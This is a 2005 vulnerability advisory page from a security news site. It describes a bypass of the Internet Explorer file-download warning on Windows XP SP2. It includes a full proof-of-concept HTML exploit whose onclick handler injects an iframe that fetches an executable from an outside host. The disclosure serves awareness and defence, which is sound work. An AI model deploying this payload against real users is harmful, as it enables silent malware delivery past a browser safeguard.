Main Menu
Network
Sponsor
Top 10 Sites
Partners
|
|
Top Submit newsSubscribe 
Communication | Computer Crime | Digital Audio, Video, Photo | General News | Hardware | Internet | Mobile | PDA | Security | Software | Vulnerability |
Previous articleBack to news listNext article
| Sponsored links | Want to become one of our authors and see your work published on ALLSeek.iNFO ?
| | Microsoft IE Windows XP SP2 File Download Security Can Be Bypassed With Dynamic IFRAME Tag |
|---|
Categorie: Vulnerability
Posted: 2005-01-15 by ReCall
Views: 590
Source: Click here
| Current Rating: Not rated
|
| | Details |
|---|
Description: Rafel Ivgi (The-Insider) reported a vulnerability in Microsoft Internet Explorer (IE) on Windows XP SP2. A remote user can bypass the file download security warning mechanism.
A remote user can create HTML containing a specially crafted BODY tag with an onclick event that invokes the createElement method to dynamically create an IFRAME window with an executable file source. When the HTML is loaded and the target user clicks anywhere within the body, the referenced executable file source will be downloaded without presenting the target user with the XP SP2 file download warning message.
Exploit:
Paste into an htm/html file and add "<" at the begining of each line:
------------------------ cut here --------------------------------------
!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
!-- saved from url=(0031)http://theinsider.deep-ice.com/ -->
HTML><HEAD><TITLE>The-Insider http://theinsider.deep-ice.com</TITLE>
META http-equiv=expires content="01 Jan 1998 01:01:00 GMT">
META http-equiv=Content-Type content="text/html; charset=windows-1252">
META http-equiv=Content-Language content=en-us>
META content=True name=HandheldFriendly>
META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD>
embed>
body onclick='a=document.createElement("\<iframe src=\"http:\/
\/theinsider.deep-
ice.com\/malware.exe\"\>\<\/iframe\>");document.body.appendChild
(a);setTimeout("document.execCommand\(\"refresh\")",1000)'>
cebter><br><br><br><br><br><br>Click AnyWhere You Want</cen
ter>
/BODY></HTML>
------------------------ cut here --------------------------------------
Impact: A remote user can bypass the Windows XP SP2 file download security mechanism.
Solution: No solution was available at the time of this entry.
| | Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=1292
| | User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
| Previous articleBack to news listNext article
|
|
|
|
InterJOB.su
|
